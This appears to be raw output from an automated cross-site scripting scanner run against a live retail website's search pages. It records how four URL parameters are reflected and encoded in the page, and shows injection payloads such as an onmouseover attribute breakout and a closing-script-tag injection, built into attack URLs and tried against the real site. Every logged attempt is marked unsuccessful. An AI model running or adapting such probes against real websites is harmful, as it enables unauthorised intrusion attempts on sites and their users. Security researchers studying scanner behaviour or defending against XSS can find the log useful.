https://www.containerstore.com/elfa/designCenter/index.htm

GET Params:[4]
['source', 'refinements', 'q', 'Ntt']
_______________________________________________________________________________________________________
https://www.containerstore.com/s?source=(uvw"xyz'yxz</zxy&refinements=&q=

----------------------------------------------------------------------------------
Attribute Context: [1]
<input type="hidden" name="retURL" value="http://www.containerstore.com/s?source=(uvw&quot;xyz'yxz&lt;/zxy&amp;refinements=&amp;q=&amp;resp=1"/>

----------------------------------------------------------------------------------
HTML Context: [0]

----------------------------------------------------------------------------------
Script Context: [0]

----------------------------------------------------------------------------------
URI Context: [2]
<a  href="/profile/login.htm?successUrl=%2fs%3fsource%3d%26%23x28%3buvw%26quot%3bxyz%26%2339%3byxz%26lt%3b%2fzxy%26refinements%3d%26q%3d" class="secondary-nav__link">
<a  href="/profile/login.htm?successUrl=%2fs%3fsource%3d%26%23x28%3buvw%26quot%3bxyz%26%2339%3byxz%26lt%3b%2fzxy%26refinements%3d%26q%3d" class="link-bar__link">

----------------------------------------------------------------------------------


ENCODING     Presence	"	'	<	( 
ATTR:		True	True	False	True	False

Attack Payloads for ATTR
["' onmouseover='alert(1)"]

ATTR Attack Url: https://www.containerstore.com/s?source=' onmouseover='alert(1)&refinements=&q=

 ______ UnSuccessful with payload: ' onmouseover='alert(1)

ENCODING     Presence	"	'	<	( 
URL:		True	True	True	True	True

Attack Payloads for URL
[]
ENCODING     Presence	"	'	<	( 
URL:		True	True	True	True	True

Attack Payloads for URL
[]
_______________________________________________________________________________________________________
https://www.containerstore.com/s?source=form&refinements=(uvw"xyz'yxz</zxy&q=

----------------------------------------------------------------------------------
Attribute Context: [1]
<input type="hidden" name="retURL" value="http://www.containerstore.com/s?source=form&refinements=&#x28;uvw%22xyz&#39;yxz%3C/zxy&q=&resp=1"/>

----------------------------------------------------------------------------------
HTML Context: [0]

----------------------------------------------------------------------------------
Script Context: [0]

----------------------------------------------------------------------------------
URI Context: [2]
<a  href="/profile/login.htm;jsessionid=C7868916260A3C89AF63F835A5C07708.dfwintas15prd-inst115?successUrl=%2fs%3fsource%3dform%26refinements%3d%26%23x28%3buvw%2522xyz%26%2339%3byxz%253C%2fzxy%26q%3d" class="secondary-nav__link">
<a  href="/profile/login.htm;jsessionid=C7868916260A3C89AF63F835A5C07708.dfwintas15prd-inst115?successUrl=%2fs%3fsource%3dform%26refinements%3d%26%23x28%3buvw%2522xyz%26%2339%3byxz%253C%2fzxy%26q%3d" class="link-bar__link">

----------------------------------------------------------------------------------


ENCODING     Presence	"	'	<	( 
ATTR:		True	True	True	True	True

Attack Payloads for ATTR
[]
ENCODING     Presence	"	'	<	( 
URL:		True	True	True	True	True

Attack Payloads for URL
[]
ENCODING     Presence	"	'	<	( 
URL:		True	True	True	True	True

Attack Payloads for URL
[]
_______________________________________________________________________________________________________
https://www.containerstore.com/s?source=form&refinements=&q=(uvw"xyz'yxz</zxy

----------------------------------------------------------------------------------
Attribute Context: [1]
<input type="hidden" name="retURL" value="http://www.containerstore.com/s?source=form&amp;refinements=&amp;q=(uvw&quot;xyz'yxz&lt;/zxy&amp;resp=1"/>

----------------------------------------------------------------------------------
HTML Context: [1]
<title>Search Results for &#x28;uvw&quot;xyz&#39;yxz&lt;/zxy &#124; The Container Store</title>

----------------------------------------------------------------------------------
Script Context: [1]
<script type="text/javascript">
    if (typeof tcsDigitalData == "undefined") {
        tcsDigitalData = {};
    }
    tcsDigitalData.user = {};
                        tcsDigitalData.user.profile = {};
                        tcsDigitalData.user.profile.logStatus = "guest";
                tcsDigitalData.page = {};
                        tcsDigitalData.page.pageInfo = {};
                        tcsDigitalData.page.pageInfo.chatAvailability = "3";
                tcsDigitalData.groupBy = {};
                        tcsDigitalData.groupBy.autoSearch = {};
                        tcsDigitalData.groupBy.autoSearch.didYouMean = "false";
                tcsDigitalData.page.pageInfo.pageType = "Search";
                tcsDigitalData.groupBy.area = "DynamicRefinementsProduction";
                tcsDigitalData.eventSerializationId = "1E30CC56B9999C6ED700";
                tcsDigitalData.internalSearch = {};
                        tcsDigitalData.internalSearch.searchTerm = "(uvw\"xyz'yxz</zxy";
                tcsDigitalData.page.pageInfo.pageName = "Search:No Results";
                tcsDigitalData.page.pageInfo.domain = "www.containerstore.com";
                tcsDigitalData.groupBy.autoSearch.recommendations = "false";
                tcsDigitalData.user.profile.isPop = "false";
                tcsDigitalData.groupBy.autoSearch.id = "64cc1006-a147-4429-95b3-e4bad6292e9c";
                tcsDigitalData.cart = {};
                        tcsDigitalData.cart.itemCount = "0";
                tcsDigitalData.internalSearch.searchType = "internal";
                tcsDigitalData.groupBy.autoSearch.sayt = "false";
                tcsDigitalData.page.pageInfo.primaryCategory = "Search";
                tcsDigitalData.page.pageInfo.categoryId = "2";
                tcsDigitalData.groupBy.autoSearch.search = "true";
                tcsDigitalData.groupBy.autoSearch.navigation = "false";
                tcsDigitalData.internalSearch.numberOfResults = "0";
                </script>

----------------------------------------------------------------------------------
URI Context: [2]
<a  href="/profile/login.htm?successUrl=%2fs%3fsource%3dform%26refinements%3d%26q%3d%26%23x28%3buvw%26quot%3bxyz%26%2339%3byxz%26lt%3b%2fzxy" class="secondary-nav__link">
<a  href="/profile/login.htm?successUrl=%2fs%3fsource%3dform%26refinements%3d%26q%3d%26%23x28%3buvw%26quot%3bxyz%26%2339%3byxz%26lt%3b%2fzxy" class="link-bar__link">

----------------------------------------------------------------------------------


ENCODING     Presence	"	'	<	( 
ATTR:		True	True	False	True	False

Attack Payloads for ATTR
["' onmouseover='alert(1)"]

ATTR Attack Url: https://www.containerstore.com/s?source=form&refinements=&q=' onmouseover='alert(1)

 ______ UnSuccessful with payload: ' onmouseover='alert(1)

ENCODING     Presence	"	'	<	( 
HTML:		True	True	True	True	True

Attack Payloads for HTML
[]
ENCODING     Presence	"	'	<	( 
SCRIPT:		True	True	True	False	False

Attack Payloads for SCRIPT
['</script><script>alert(1)</script>']

SCRIPT Attack Url: https://www.containerstore.com/s?source=form&refinements=&q=</script><script>alert(1)</script>

 ______ UnSuccessful with payload: </script><script>alert(1)</script>

ENCODING     Presence	"	'	<	( 
URL:		True	True	True	True	True

Attack Payloads for URL
[]
ENCODING     Presence	"	'	<	( 
URL:		True	True	True	True	True

Attack Payloads for URL
[]
_______________________________________________________________________________________________________
https://www.containerstore.com/s?Ntt=(uvw"xyz'yxz</zxy

----------------------------------------------------------------------------------
Attribute Context: [1]
<input type="hidden" name="retURL" value="http://www.containerstore.com/s?Ntt=(uvw&quot;xyz'yxz&lt;/zxy&amp;resp=1"/>

----------------------------------------------------------------------------------
HTML Context: [0]

----------------------------------------------------------------------------------
Script Context: [0]

----------------------------------------------------------------------------------
URI Context: [2]
<a  href="/profile/login.htm?successUrl=%2fs%3fNtt%3d%26%23x28%3buvw%26quot%3bxyz%26%2339%3byxz%26lt%3b%2fzxy" class="secondary-nav__link">
<a  href="/profile/login.htm?successUrl=%2fs%3fNtt%3d%26%23x28%3buvw%26quot%3bxyz%26%2339%3byxz%26lt%3b%2fzxy" class="link-bar__link">

----------------------------------------------------------------------------------


ENCODING     Presence	"	'	<	( 
ATTR:		True	True	False	True	False

Attack Payloads for ATTR
["' onmouseover='alert(1)"]

ATTR Attack Url: https://www.containerstore.com/s?Ntt=' onmouseover='alert(1)

 ______ UnSuccessful with payload: ' onmouseover='alert(1)

ENCODING     Presence	"	'	<	( 
URL:		True	True	True	True	True

Attack Payloads for URL
[]
ENCODING     Presence	"	'	<	( 
URL:		True	True	True	True	True

Attack Payloads for URL
[]
